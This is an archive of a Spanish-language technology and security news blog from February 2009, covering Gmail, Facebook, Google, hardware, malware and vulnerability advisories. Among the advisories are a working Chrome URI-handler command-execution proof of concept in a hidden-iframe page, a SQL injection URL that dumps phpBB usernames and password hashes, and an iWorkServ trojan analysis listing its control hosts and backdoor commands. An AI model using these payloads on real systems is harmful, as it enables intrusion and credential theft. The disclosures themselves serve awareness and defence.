martes, 24 de febrero de 2009

Gmail se interrumpe momentáneamente

En abc.es reportan que el día de ayer a las 09.30 GMT Gmail sufrió un bloqueo y millones de usuarios en todo el mundo quedaron sin servicio de correo electrónico; los responsables del servicio ya ofrecen disculpas.

Via abc.es




jueves, 19 de febrero de 2009

Documentación en español de la suite mas completa para el análisis de la seguridad wireless

¿Qué es aircrack ?

aircrack es una colección de herramientas para la auditoría de redes inalámbricas:

* airodump: programa para la captura de paquetes 802.11
* aireplay: programa para la inyección de paquetes 802.11
* aircrack: recuperador de claves estáticas WEP y WPA-PSK
* airdecap: desencripta archivos de capturas WEP/WPA

miércoles, 18 de febrero de 2009

¿Cuántos servidores son necesarios para que google busque adecuadamente?

Jeff Dean, empleado de Google, ha respondido a la pregunta aportando varios datos técnicos que dan que pensar el alto consumo eléctrico que se genera para que cuando se realice una búsqueda, el resultado aparezca de forma tan eficiente.

En su blog personal, el señor Dean ha hecho público que para realizar una búsqueda con un rendimiento eficiente se utilizan alrededor de 1.000 máquinas, por una única búsqueda. El motivo de ello es conseguir la menor latencia posible entre la petición y la respuesta.

Dean comenta cómo ha avanzado Google en 10 años, desde 1999 hasta 2009. Según sus palabras por aquella época servían las respuestas a las búsquedas con una latencia de, normalmente, 1.000ms (1 segundo) y a comparación a día de hoy normalmente en tan sólo 200ms, una quinta parte de segundo, dando la sensación de ser casi instantánea. Dicha mejora ha sido posible gracias al cambio de la carga de los índices en memoria que hicieron hace unos años.

Así que ya sabéis, cada búsqueda en Google implica el uso de 1.000 máquinas más las que haya intermedias repitiendo la información.

via theinquirer

facebook cambia sus términos de servicio y usuarios se quejan


Según parece, el 56% de los 175 millones de usuarios de la red social se ha quejado ante el cambio de términos del servicio de Facebook, habían pasado de unos términos sencillos, borrar los datos cuando un usuario se dé de baja, a unos draconianos con los que prácticamente otorgabas derecho a Facebook sobre todos los contenidos.

La red social por excelencia, Facebook, ha tenido que dar marcha atrás ante la imposición de sus exigentes términos del servicio:
“Darás a Facebook una licencia y sublicencia internacional para usar, copiar, publicar, hacer stream, almacenar, retener, mostrar públicamente, transmitir, escanear, cambiar el formato, modificar, editar, encuadrar, traducir, extraer, adaptar, crear trabajos derivados y distribuirlo”.

Según han hecho público vuelven a los anteriores términos de uso mientras que “solucionan los problemas” que han levantado tantas quejas por parte de sus usuarios. Encuestas revelan que un 56% de los usuarios de la red social han presentado una queja ante los nuevos términos, lo que finalmente ha hecho a la empresa replantearse su estrategia.

En palabras de un representante de Facebook, no es la intención de Facebook apropiarse de tus contenidos, los contenidos siempre te pertenerán, algo que con los términos del servicio no queda nada.

Via theinquirer

AMD Phenom II X4 a 6,665 GHz


Los nuevos Phenom X4 han sido puestos a prueba por distintos equipos de overclocking, y como se esperaba se han logrado nuevos hitos en estas prácticas extremas que han permitido aumentar la frecuencia del micro de una forma asombrosa.

Tal y como nos cuentan en Noticias3D, tres frikis finlandeses han utilizado un sistema de refrigeracion basado en nitrógeno líquido para poner uno de esos procesadores a trabajar a una frecuencia de 6.665 MHz, lo que les ha permitido lograr todo tipo de records en distintos benchmarks.

Por ejemplo, han logrado 35.273 puntos en 3DMark06 (algo menos que el actual procesador más rápido, un Intel Core i7 965 EE), y además otra de las pruebas de rendimiento más importantes, Super Pi -en concreto, la prueba llamada 1M-, logró completarse en 10,7 segundos, lo que por lo visto es todo un logro teniendo en cuenta que los micros de Intel suelen ser inalcanzables en ese apartado.

Via theinquirer

domingo, 15 de febrero de 2009

Expertos recomiendan realizar el calentamiento antes de jugar Wii



La consola de videojuegos de Nintendo es una de las más populares en todo el mundo. Sin embargo, utilizarla sin una buena preparación física puede provocar lesionesevitables
Sin lugar a dudas, Nintendo Wii es una propuesta diferente en lo que se refiere a consolas de videojuegos. Gracias a ella es posible realizar deportes casi como si se lo hiciera al aire libre en el mundo real salvo que en este caso nuestro contrincante será la misma computadora.

Puede ser una propuesta muy divertida. Sin embargo, los médicos aconsejan realizarse al menos un chequeo médico y un importante precalentamiento físico antes de introducirse en el maravilloso mundo Wii. Un mal estado físico o un poco preparación pueden ser peligrosas a la hora de prender la consola de Nintendo.

La falta de una buena preparación física o un deficiente precalentamiento antes de jugar, puede provocar lesiones que son evitables. El diario tucumano La Gaceta resalta la afección muscular bautizada con el nombre de Wii Knee, que provoca dolor de rodillas ante una exposición muy prolongada delante de la consola.

Nintendo Wii es, en conjunto con la Sony Playstation 3, la consola de juegos más vendida en el mundo. Los juegos más populares son el programa de gimnasia Wii Fit y un programa de deportes denominado Wii Sports, en el cual se incluye el tenis, el béisbol y el golf, entre otros.

Via infobae

¿Cómo proteger el correo electrónico?


La amenaza del robo de información contenida en un correo electrónico o un sistema de una organización volvió a cobrar relevancia tras conocerse causas judiciales que pusieron a la luz investigaciones por el robo y tráfico de información confidencial.

En la actualidad, si bien un hacker (aquel que accede a información en un sistema informático sin autorización) o un cracker (quien accede al haber robado la contraseña mediando el uso de softwares) son percibidos como una amenaza para la seguridad de una organización, no son las únicas. Entre las principales causas de vulnerabilidad se encuentra la ingeniería social, acaso una de las formas más utilizadas para violar una cuenta de correo electrónico.

Esta amenaza, si bien parece novedosa, no es más que el engaño para obtener información u otro beneficio; el clásico engaño que desde hace mucho tiempo conocemos como el cuento del tío.

El típico ejemplo que mejor ilustra esta problemática es el del llamado telefónico: “Buenas tardes, lo llamo de Microsoft. Veo que su nombre de usuario es maria_lopez122, pero no tiene configurada una “pregunta secreta” en su cuenta. Tuvimos un problema con la misma, alguien intentó utilizarla para cometer un delito y, a efectos de que la cuenta no sea desactivada, necesito que corrobore su contraseña…”.

Confianza ciega
En la práctica, una contraseña es frecuentemente compartida con colegas de la organización, personal del soporte técnico, familiares, amigos, etc. Como en todas las relaciones humanas, la confianza es un bien preciado que tiene su contrapartida en la traición. De esta forma, aquello que se percibía seguro, la contraseña más compleja, mejor lograda, puede ser conocida por individuos con intereses opuestos al dueño de la casilla de correo; una situación que puede provocar daños graves a una persona o a una compañía.

Contra el enfoque de los administradores de redes de generar estrategias de blindaje cada vez más sólidas, se perfeccionaron las herramientas de “ingeniería social” orientadas a vulnerar casillas de correo, sin la necesidad de hackear ni crackear. La ingeniería social no es sino el uso de la manipulación de las personas para que realicen actos o divulguen información confidencial.

En este sentido, la mejor o quizás única forma de proteger la privacidad del correo y del resto de la información es capacitar a las personas para que nunca revelen información confidencial a un extraño por más convincente que pueda parecer el pretexto. Por cierto, las medidas de seguridad tradicional siguen siendo válidas: cuidar las contraseñas, cambiarlas periódicamente, por ejemplo cada 90 días, y evitar utilizar información conocida por el entorno como fechas de nacimiento, direcciones físicas, nombres de familiares, mascotas, etc.


Es simple. La falta de conocimiento y capacitación en los recursos humanos puede determinar el fracaso, incluso contando con los sistemas de protección más avanzados. Un complemento recomendable es sumar la supervisión externa de profesionales especializados en seguridad informática, con experiencia en múltiples organizaciones y tecnologías, que brinden apoyo para monitorear la funcionalidad de los sistemas de seguridad y capacitar al personal interno.

En pocas palabras, la seguridad del correo electrónico y otros documentos digitales yace en gran medida en la habilidad de los usuarios para administrar sus contraseñas de manera segura y responsable, y de las compañías, de generar y comunicar claramente las políticas de seguridad en torno al uso de los sistemas, en donde circula uno de sus bienes más preciados, la información.

Alessio Aguirre-Pimentel
Director del Área Seguridad Informática e Informática Forense
FTI Consulting de Argentina

Via Infobae

sábado, 14 de febrero de 2009

Portátiles militares estadounidenses acaban en el mercado negro de Pakistán


La ciudad de Peshawar, conexión entre Pakistan y Afganistán, mantiene la reputación de ser un paraíso para los contrabandistas, y en su mercado negro se puede encontrar cualquier tipo de arma y hasta portátiles militares que esperemos no sean los perdidos por el laboratorio de armas nucleares de los Álamos.

Por 650 dólares se puede comprar un portátil militar como el de la imagen, en el mercado de Sitara de la ciudad de Peshawar, al noroeste de Pakistán, que se ha convertido en una zona peligrosa utilizada como ruta de suministro por las tropas de la OTAN que operan en la zona.

El portátil parece forma parte de un kit de diagnóstico de vehículos y almacena la identidad de numerosos militares y fallos de los vehículos que los estadounidenses mantienen en la guerra de Afganistán.

Un portavoz del Pentágono indicó que “las computadoras con información sensible normalmente no viajan en camiones a través de Pakistán”, aunque admitió que los vehículos de los contratistas civiles son atacados o saqueados con asiduidad.

Unos ataques y el riesgo potencial de que diversa información “llegue a manos equivocadas”, son el motivo de que la OTAN esté buscando rutas alternativas en una de las zonas más conflictivas del planeta.

Samsung produce GDDR5 a 7 GHz

La multinacional coreana, el mayor productor mundial de memoria DRAM, ha comunicado el inicio de la fabricación en masa de chips de memorias GDDR5 en procesos de 50 nanómetros. Los nuevos chips podrán alcanzar frecuencias de 7 GHz con un ancho de banda sin precedentes de 448 GB/s, en interfaces de 512 bits.

El paso a procesos de fabricación de 50 nanómetros permite además, reducir el consumo de los chips a 1,35 voltios. Otra de las ventajas es la reducción de costes, aumentando la eficiencia de la producción hasta en un 100% frente a procesos de 60 nanómetros, señalan desde Samsung.

Los chips GDDR5 a 7GHz GDDR5 proporcionarán un ancho de banda máximo de 224/448 GB/s con interfaces de memoria de 256 y 512 bits respectivamente.

No se conoce los modelos de tarjetas gráficas de ATI o NVIDIA que utilizarán los módulos de Samsung, aunque se podrían incorporar a los próximos desarrollos de gama alta que llegarán a finales de año, señalan en X-Bit Labs.

En Samsung apuestan fuerte y junto a las nuevas GDDR5 para gráficas, se une la reciente validación de los primeros chips DRAM en procesos de 40 nanómetros, que abren el camino a la producción de memoria RAM de ultra-alto rendimiento DDR4.

Microsoft es demandadao por cobrar el Downgrade

Una ciudadana estadounidense ha presentado una demanda judicial contra Microsoft por el cobro de 59,25 dólares del downgrade de Vista Business a XP profesional en un portátil de Lenovo.

Emma Alvarado invita a otros usuarios que estén en su misma situación para que se unan a la “class-action”, el procedimiento judicial de demanda colectiva iniciado.

Los abogados de la consumidora indican que muchos clientes que compraron PCs con Vista, optaron por “rebajarlo” a XP, ante los “numerosos problemas de Vista”, recalcan.

Ante las peticiones de XP, “Microsoft utilizó su monopolio exigiendo comprar Vista para a continuación hacer el downgrade”. Según la demanda “estas prácticas desleales violan las leyes comerciales del estado de Washington y las de protección del consumidor”.

Microsoft se enfrenta en el mismo tribunal a las demandas por el escándalo del Vista Capable, la presunta publicidad engañosa del preparado para Vista, que podría suponer a la compañía un cargo de 8.520 millones de dólares.

Via theinquirer

La guerra de las discográficas contra el p2p ha sido inúil

Lo reconoce el antiguo presidente de la Federación Internacional de la Industria Fonográfica (IFPI) y ex director de EMI / Virgin Norway.

Eirik Johansen reconoce en una entrevista para el Norway`s Dagbladet, que la lucha contra las descargas en Internet por parte de la industria musical ha demostrado ser inútil:

"Lo principal es que toda una generación ya viola el copyright, y lo único que podemos hacer es buscar mejores soluciones".

"Nunca nadie ha ganado una batalla luchando contra una nueva tecnología".

Johansen no obstante ve con optimismo la industria musical, destacando el crecimiento producido en el mercado de conciertos en vivo y mostrando especial entusiasmo por los nuevos modelos de hacer dinero a partir de la música:

"Me siento muy optimista. Se ha producido una revolución, y a raiz de ello, todo es ahora muy caótico, aunque existe un espíritu empresarial que es a la vez sano y emocionante. No sabemos donde estará la industria en un año o dos, pero estoy convencido de que el futuro parece prometedor. "

Vía BandaAncha

Por qué el 92% de las vulnerabilidades críticas en Windows minimizarían su impacto si no se usase la cuenta de administrador

BeyondTrust ha emitido un escueto informe en el que afirma que el impacto del 92% de las vulnerabilidades críticas en Windows se minimizaría si no se usasen los privilegios de administrador. El uso de la cuenta de administrador, como ya hemos defendido desde aquí en otras ocasiones, es uno de los más graves problemas con los que se enfrenta Microsoft y que el propio Windows ha ayudado a alimentar con versiones anteriores. Veremos contra qué tipo de vulnerabilidades protege el principio de mínimo privilegio y por qué, en realidad, el informe no descubre nada nuevo: el principio de mínimos privilegios es una regla que siempre ha estado ahí para todos los sistemas operativos... menos para los de Microsoft.

BeyondTrust ha publicado un estudio pormenorizado de todas las vulnerabilidades publicadas por Microsoft en 2008. Ha concluido que el 92% de las vulnerabilidades críticas y el 69% de todas (críticas o no) serían menos graves, o tendrían un impacto mucho menor, si fuesen aprovechadas por un atacante pero la víctima no fuese administrador. Cuando un atacante aprovecha una vulnerabilidad de ejecución de código en un programa que está siendo usado por un administrador, éste código hereda sus permisos y el atacante podrá campar a sus anchas (como el usuario) en el sistema una vez explotado el fallo. En un 92% de los casos, según el informe, se hubiese limitado considerablemente la gravedad del asunto.

Desde Hispasec siempre se ha recomendado evitar la cuenta administrador, es el principal consejo para los usuarios de sistemas operativos en general y los de Windows en particular. Esta es la primera capa de seguridad con la que se debe proteger un usuario. Un "administrador" está precisamente para "administrar", y son muy pocas veces las que un usuario utiliza su sistema para realizar modificaciones importantes. La mayor parte del tiempo lee correo o navega, actividad esta última que conlleva un importante riesgo, sea con el navegador que sea. Esta irresponsable actitud de usuario administrador perpetuo está heredada de los tiempos de Windows 9x. No tenía sistema de usuarios local real, ni soportaba NTFS, con lo que no se podían establecer permisos por usuarios. Con XP, por fin, Microsoft permitía la creación de un usuario inicial distinto al administrador para el uso del sistema, pero lo incluía por defecto al grupo administradores y por tanto no lo protegía ni limitaba en absoluto.

El otro 8%

El informe no explica por qué el impacto de tantas vulnerabilidades es susceptible a la cuenta bajo la que se exploten. ¿Por qué no nos protege del 100% de las vulnerabilidades críticas el hecho de trabajar como usuario sin privilegios? Pues porque el resto, el 8% de vulnerabilidades se pueden clasificar básicamente en tres:

* Las que permiten revelación de información. Estas suelen ser independientes del usuario bajo el que se explota la vulnerabilidad.

* Las que afectan a servicios de sistema que corren siempre bajo cuentas privilegiadas. Los servicios especiales de sistema corren normalmente bajo la cuenta SYSTEM. Si un atacante aprovecha un fallo en estos servicios desde el exterior, no hay nada que el usuario pueda hacer para evitarlo excepto intentar precisamente que el servicio no esté accesible para cualquiera. Hay que recordar que ya hicieron un trabajo importante de limitación de cuentas de servicio cuando apareció XP. En 2000 todos los servicios trabajaban con los máximos privilegios. En XP y 2003, no.

* Las elevaciones de privilegios. Evidentemente, este tipo de vulnerabilidades permiten precisamente saltar de una cuenta sin privilegios a otra con mayor capacidad de actuación sobre el sistema. Si se trabaja con cuenta limitada, es una de las mayores preocupaciones. Si se trabaja como administrador, estas vulnerabilidades no suelen tienen impacto (excepto si logran privilegios de SYSTEM, ligeramente superiores a los del propio Administrador). Hoy en día, las vulnerabilidades de elevación de privilegios son poco valoradas por los atacantes (en especial los creadores de malware) porque presuponen (y presuponen bien) que su víctima será administrador.

¿Windows un 92% más seguro?

Significa que el trabajar con cuentas con privilegios menos elevados ayudaría a que el sistema fuese un 92% más seguro? Desgraciadamente no, pero sin duda ayudaría.

Trabajar como usuario con pocos privilegios no es la panacea. Trabajar como usuario raso en XP o 2000 con cierto software puede llegar a ser incómodo, incluso para usuarios experimentados (y casi siempre esto es responsabilidad de los propios programadores, que no suelen tenerlo en cuenta). Es necesario tener conocimientos sobre permisos, privilegios, NTFS, derechos, herencias, grupos... Por si fuera poco, con ánimo de no complicar al usuario, Windows XP Home Edition esconde deliberadamente la pestaña de seguridad para poder cambiar los permisos, a no ser que se trabajara en modo a prueba de fallos. En otros sistemas operativos resulta más sencillo, porque los programadores siempre han supuesto que su usuario no iba a gozar de todos los permisos.

El problema es, como de costumbre, la educación del usuario ante una estructura tan compleja como hoy en día es un sistema operativo. Estamos tan mal acostumbrados que si un usuario de cualquier sistema operativo (distinto a Windows) se convierte en víctima del exploit de una vulnerabilidad, y por ello el sistema queda totalmente comprometido, lo primero que preguntamos es si estaba trabajando como root. Si es así, inmediatamente la mayor parte de la responsabilidad cae del lado del usuario (abstrayéndonos de la responsabilidad del software). Se entiende como una especie de castigo justo por no conocer y limitar convenientemente su entorno de trabajo, o por despiste. En Windows, si un usuario es víctima de un malware que se le ha colado a través del navegador, y esta víctima trabaja como administrador (lo más habitual) el problema se achaca directamente al sistema operativo o al navegador y sus continuos fallos. No solemos pararnos a pensar en que el usuario, tampoco en este caso, conoce realmente su entorno de trabajo o no se le han proporcionado la facilidades para hacerlo, y por eso no lo ha limitado convenientemente. Limitándolo, si bien no se reduciría el número de fallos, sí se degradará considerablemente su impacto, como bien recuerda el informe.

Más Información:

Reducing the Threat from Microsoft Vulnerabilities: 92% of Critical
Vulnerabilities can be Mitigated by Removing Admin Rights
http://www.beyondtrust.com/documentation/whitePapers/wp_VulnerabilityReport.pdf

viernes, 13 de febrero de 2009

Recompensa de 250 mil dólares a quien ofrezca información acerca de los creadores de conficker

EL gigante del software ha ofrecido una recompensa de 250.000 dólares a quien logre identificar a los creadores del virus "Conficker" o "Downadup".

Conficker, también conocido como Downadup, continúa propagándose las últimas semanas a millones de ordenadores, incluido parte del ejército francés.

Los cazas de la marina francesa no pudieron descargar sus planes de vuelo después de que las bases de datos se vieran infectadas por el virus.

George Stathakopoulos, uno de los responsables de seguridad de Microsoft declara que la intención de la compañía es la de controlar la amenaza que representa Conflicker y dar un ejemplo con el creador del mismo.

Se especula que actualmente hay 12 millones de ordenadores infectados por Conficker o Downaup.

Via hispamp3

sábado, 7 de febrero de 2009

Las extensiones para Google Chrome llegarán en mayo

Está previsto que el navegador de Google comience a soportar extensiones el próximo mes de mayo.

Concretamente será el 27 de mayo durante una sesión de Google I/O. "Aprende cómo Google Chrome permite de forma fácil escribir extensiones usando las tecnologías web que ya conoces. En la charla hablaremos de los principios básicos del sistema de extensiones (distribución, empaquetado, instalación y actualizaciones) así como de los diferentes APIs para realzar con el navegador".

Las primeras extensiones que estarán disponibles:
- Bookmarking/navigation tools: Delicious Toolbar, Stumbleupon, web-based history, new tab page clipboard accelerators
- Content enhancements: Skype extension (clickable phone numbers), RealPlayer extension (save video), Autolink (generic microformat data - addresses, phone numbers, etc.)
- Content filtering: Adblock, Flashblock, Privacy control, Parental control
- Download helpers: video helpers, download accelerators, DownThemAll, FlashGot
- Features: ForecastFox, FoxyTunes, Web Of Trust, GooglePreview, BugMeNot

Via Hispamp3

Simple Machines Forum Password Reset Security Bypass Vulnerability

Bugtraq ID: 33219
Class: Access Validation Error
CVE:
Remote: Yes
Local: No
Published: Jan 12 2009 12:00AM
Updated: Feb 06 2009 11:18PM
Credit: Xianur0
Vulnerable: Simple Machines SMF 1.1.5
Simple Machines SMF 1.1.5
Simple Machines SMF 1.1.4
Simple Machines SMF 1.1.3
Simple Machines SMF 1.1.2
Simple Machines SMF 1.1.1
Simple Machines SMF 1.1 rc3
Simple Machines SMF 1.1 rc3
Simple Machines SMF 1.1 rc2
Simple Machines SMF 1.1 rc1
Simple Machines SMF 1.1 final
Simple Machines SMF 1.0.13
Simple Machines SMF 1.0.13
Simple Machines SMF 1.0.12
Simple Machines SMF 1.0.12
Simple Machines SMF 1.0.11
Simple Machines SMF 1.0.10
Simple Machines SMF 1.0.9
Simple Machines SMF 1.0.8
Simple Machines SMF 1.0.8
Simple Machines SMF 1.0.7
Simple Machines SMF 1.0.6
Simple Machines SMF 1.0.5
Simple Machines SMF 1.0.4
Simple Machines SMF 1.0.3
Simple Machines SMF 1.0.2
Simple Machines SMF 1.0.1
Simple Machines SMF 1.0 -beta5p
Simple Machines SMF 1.0 -beta4p
Simple Machines SMF 1.0 -beta4.1
Simple Machines Simple Machines Forum 1.1.5
Simple Machines Simple Machines Forum 1.1.4
Simple Machines Simple Machines Forum 1.1.3
Simple Machines Simple Machines Forum 1.1.2
Simple Machines Simple Machines Forum 1.1.1

Not Vulnerable: Simple Machines Simple Machines Forum 1.1.6
Simple Machines Simple Machines Forum 1.0.14

Attackers can exploit this issue via a browser.

The following exploit code is available:

http://www.securityfocus.com/data/vulnerabilities/exploits/33219.pl

Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<title>Chrome URI Handler Remote Command Execution PoC</title>

<h3>This is a test</h3>
<iframe src="chromehtml:%22%20--renderer-path=%22calc%22%20--no-sandbox" width="0" height="0"></iframe>


# milw0rm.com [2009-01-30]

viernes, 6 de febrero de 2009

phpBB Filebase Module 'filebase.php' SQL Injection Vulnerability

Se ha descubierto una vulnerabilidad que permite a un atacante navegar sobre el sitio web afectado para explotar este fallo de seguridad.

Ejemplo:


http://www.example.com/filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*

jueves, 5 de febrero de 2009

Rogue: falsos antivirus

rogue, que tienen como objetivo simular ser una solución de seguridad real.

El video muestra cómo un rogue realiza una exploración falsa con el fin de engañar al usuario y que instale el falso antivirus, dividido en dos partes: cómo ocurre la infección y que debería haber hecho el usuario para no infectarse, más allá del uso de un antivirus capaz de detectar la amenaza.

Video

Virus para Mac OS X distribuido por redes P2P, a través de software ilegal - iWorkServ

Fecha de publicación: 26/01/2009
Sistemas afectados

* Mac OS X

Descripción

Se está distribuyendo una "copia pirata" del software iWork2009 a través de redes de intercambio de archivos P2P, la cual ha sido infectada con el troyano iWorkServ

Actualizado 29/01/2009: Se han descubierto nuevas versiones del troyano, en las copias ilegales de programas como Adobe Photoshop CS4.
Solución

Estas infecciones se pueden minimizar utilizando software legítimo de fabricantes y distribuidores de confianza. Por el contrario si el software que se utiliza tiene procedencia "dudosa" se corre el riesgo de instalar además del software deseado, alguno otro programa malicioso.

Si ya se está infectado, seguir los pasos que nos indica INTECO-CERT en el apartado de desinfección del virus.
Detalle

Han introducido en las redes P2P una copia ilegal del programa iWorks2009, con un virus dentro. Este virus es capaz de robar información, como contraseñas, cuentas bancarias, números de tarjetas de crédito… y es capaz de enviarla por Internet.

Se han difundido, según algunas fuentes, en torno a 20.000 copias del archivo infectado, lo que ha provocado una infección considerable en los sistemas MAC, esto implica que NINGÚN SISTEMA OPERATIVO ESTA LIBRE DE ATAQUES.

Este tipo de virus que funcionan de esta forma se denominan troyanos, y algunos de ellos forman redes de “Zombies” o “botnets”, que son usadas para mandar correo masivo (Spam), robar datos o atacar a otros ordenadores.

Este virus ha puesto de manifiesto el riesgo de seguridad de utilizar software pirata descargado de las redes de intercambio P2P. El software procedente de redes P2P puede contener un virus de este tipo, y es el propio usuario el que infecta su ordenador al instalarlo. Esta forma de infección no necesita aprovecharse de errores en el sistema operativo, navegador u otros programas, sino que es el propio usuario el que provoca la infección a través de la descarga de software de procedencia dudosa.

REFERENCIAS:

* Hispasec (open a new window)
* Segur-info (open a new window)
* CA (open a new window)
* Sophos (open a new window)
* Symantec (open a new window)
* Trend Micro (open a new window)
* Intego (open a new window)


iWorkServ: Troyano para MAC OSX que abre una puerta trasera y hace al equipo comprometido actuar como un servidor P2P.

# Peligrosidad: 1 - Mínima
Nombre completo del virus: Backdoor.MAC/iWorkServ@Otros
# Tipo de código: Backdoor Programa que permite a otro usuario acceder de forma no autorizada al ordenador infectado.
#
Plataformas afectadas: MAC Macintosh, pudiendo afectar a los diferentes sistemas operativos de la familia Mac OS X
# Capacidad de residencia permanente : No. No tiene capacidad para ejecutarse automáticamente en cada reinicio del sistema.
# Tamaño (bytes): 413.568
# Alias:
* OSX_KROWI.A (Trend Micro)
* OSX/iWorkS-A (Sophos)
* OSX/IWService (McAfee)
* OSX.Iservice (Symantec)
* Backdoor:OSX/iWorkServ.A (F-Secure)
* OSX/Krowi.A (Computer Associates)
* OSX.Trojan.iServices.A (Intego)

Propagación

Capacidad de autopropagación: No

Carece de rutina propia de propagación. Puede llegar al sistema de las siguientes maneras:

iWork es un conjunto de aplicaciones de productividad creado por Apple Inc. La versión de prueba legítima puede ser descargada de:

* http://www.apple.com/iwork/download-trial/

Sin embargo, hay copias no legítima de iWork2009 en sitios de compartición de ficheros. Algunas de estas copias ilegítimas contienen un troyano malicioso con funcionalidades de P2P.

Infección/Efectos

Cuando iWorkServ se ejecuta, realiza las siguientes acciones:

El troyano usa un fichero llamado iWorkServices que es parte del paquete instalador. Este fichero es el que es detectado por F-Secure como iWorkServ.A .

El fichero se instala en:

* /System/Library/StartupItems/iWorkServices

...y lo hace con permisos de lectura, escritura y ejecución.

Al ejecutarse, el troyano, comprueba si se esta ejecutando como Administrador usando las funciones de la API "_geteuid" y "_getpwuid" y luego comprobando si la salida es "root".

Si no dispone de estos permisos, simplemente finaliza su ejecución.

En cambio, si se esta ejecutando como root, el siguiente paso es comprobar si el fichero de ejecución tiene el nombre "iWorkServices". Si no es asi, el troyano borrará el fichero "/tmp/.iWorkServices".

A continuación el troyano crea los siguientes ficheros:

* /System/Library/StartupItems/iWorkServices/iWorkServices
* /System/Library/StartupItems/iWorkServices/StartupParameters.plist
* /usr/bin/iWorkServices

Los ficheros con nombre iWorkServices son copias de sí mismo.

El fichero "StartupParameters.plist" tiene los siguientes contenidos:

{ Description = "iWorkServices";
Provides = ("iWorkServices");
Requires = ("Network");
OrderPreference = "None"; }

Efectos

El troyano puede intentar conectarse con las siguientes IPs:

* 69.92.177.146:59201
* qwfojzlk.freehostia.com:1024

Una vez instalado y en ejecución , un atacante remoto podría descargar y/o ejecutar ficheros usando los siguientes comandos P2P:

* banadd
* banclear
* clear
* get
* httpget
* httpgeted
* leafs
* nodes
* p2pihist
* p2pihistsize
* p2plock
* p2pmode
* p2ppeer
* p2ppeerport
* p2ppeertype
* p2pport
* p2punlock
* platform
* rand
* rshell
* script
* sendlogs
* set
* shell
* sleep
* socks
* system
* uid
* unknowns
* uptime

Contramedidas
Desinfección

*

Con un antivirus actualizado, localice todas las copias del virus en el disco duro de su MAC. Si no dispone de antivirus, visite nuestra página de Antivirus gratuitos .

Elimine los siguientes ficheros o directorios:
o /System/Library/StartupItems/iWorkServices/iWorkServices
o /System/Library/StartupItems/iWorkServices/StartupParameters.plist
o /usr/bin/iWorkServices
o /System/Library/StartupItems/iWorkServices
*

Elimine todos los archivos temporales del ordenador, incluidos los archivos temporales del navegador, vacíe también la Papelera de reciclaje.
*

Reinicie su ordenador y explore todo el disco duro con un antivirus para asegurarse de la eliminación del virus. Si desactivó la restauración del sistema, recuerde volver a activarla. Cree un punto de restauración, le resultará útil para recurrir a él en caso de posibles infecciones o problemas en el futuro.

Via Inteco

La nueva versión de Firefox soluciona seis vulnerabilidades

Mozilla ha publicado su nueva versión 3.0.6 de Firefox, abandonando ya por primera vez la rama 2.x en cuestión de seguridad. Como todas las pequeñas actualizaciones de Firefox, su fin principal es solucionar vulnerabilidades, seis en este caso. También afectan a Seamonkey y Thunderbird, aunque, como de costumbre, de estos programas no se publicará actualización hasta más adelante.

Brevemente, las vulnerabilidades de Firefox clasificadas por criticidad son:

Bajas:
* Las directivas con las que las páginas indican que no deben ser cacheadas no eran aplicadas.
* Se podían leer las cookies HTTPOnly con XMLHttpRequest.

Moderadas:
* Elevación de privilegios en Chrome a través de ficheros .desktop.

Altas:
* Robo de ficheros locales con SessionStore.
* Cross-site scripting usando el método XBL y window.eval.

Críticas:
* De nuevo problemas con JavaScript y evidencias de posibilidad de ejecución de código.

Otra vez el motor JavaScript como el origen de la mayoría de problemas de seguridad graves en Firefox. Al menos, no se tiene constancia de que los fallos de seguridad hayan sido aprovechados de forma regular por atacantes, ni de la existencia de exploits públicos.

Aunque Thunderbird sufre de cuatro de estos últimos problemas de seguridad, todavía no se ha publicado la versión que los soluciona. Habitualmente su publicación se retrasa varios días, sin motivo aparente. En este caso se espera que la versión 2.0.0.21 del cliente de correo solvente los fallos, pero no se sabe cuándo verá la luz.

Esta es la primera tanda de vulnerabilidades corregidas en 2009 por la fundación Mozilla. En los años anteriores, la media de publicación habla de, aproximadamente, un lote de boletines de seguridad cada mes, sin regularidad preestablecida. En 2008 la fundación Mozilla publicó 69 boletines de seguridad, que corregían más de 70 vulnerabilidades (algunos boletines advertían sobre más de una vulnerabilidad). 29 de ellos fueron calificados como críticos (el 42%). En 2007, 14 eran críticos de un total de 40 boletines (el 35%). La inmensa mayoría de los fallos graves, han estado relacionados con el motor JavaScript del navegador.


Más Información:

Mozilla Foundation Security Advisories
http://www.mozilla.org/security/announce/

Via hispasec

martes, 3 de febrero de 2009

MySpace expulsa a 90.000 delicuentes sexuales de su red

San Francisco. (dpa) - El sitio web de redes sociales MySpace.com señaló hoy que expulsó a más de 90.000 delincuentes sexuales registrados después de un acuerdo alcanzado el año pasado con fiscales generales en Estados Unidos para mejorar la seguridad de los niños.

La cifra, otorgada por MySpace al fiscal general del estado de Connecticut Richard Blumenthal, representó más del doble del número que el portal previó cuando lanzó la campaña sobre amenazas online para menores.

"Esta terrible revelación representa una prueba convincente de que en los sitios de redes sociales continúan abundando predadores sexuales", dijo Blumenthal en un comunicado.

Los delincuentes fueron hallados a través de direcciones de correo electrónico y nombres ocultos requeridos por las autoridades.

Blumenthal advirtió que probablemente haya aún miles de delincuentes sexuales más escondidos en sitios de redes sociales utilizando nombres y direcciones de correo no registradas.

Via lavanguardia

I-Rater Basic(messages.php) SQL-injection.

Descripción: Una vulnerabilidad de inyección SQL en messages.php en I-Rater Basic permite a atacantes remotos ejecutar consultas SQL arbitrarias a través del parametro IDP.

Publicado antes de: 02/02/2009 - Última modificación: 03/02/2009
Gravedad: Alta

Tipo de Pérdida:
* Protección de seguridad
* Confidencialidad
* Integridad
* Disponibilidad
* Otra protección de seguridad

Enlaces:

* http://www.securityfocus.com/bid/32912
Fuente: BID Nombre: 32912

* http://www.milw0rm.com/exploits/7514
Fuente: MILW0RM Nombre: 7514

* http://secunia.com/advisories/33213
Fuente: SECUNIA Nombre: 33213 [Asesor]

Productos Afectados:

* I-Rater - i-rater_basic - _nil_

#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################

###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
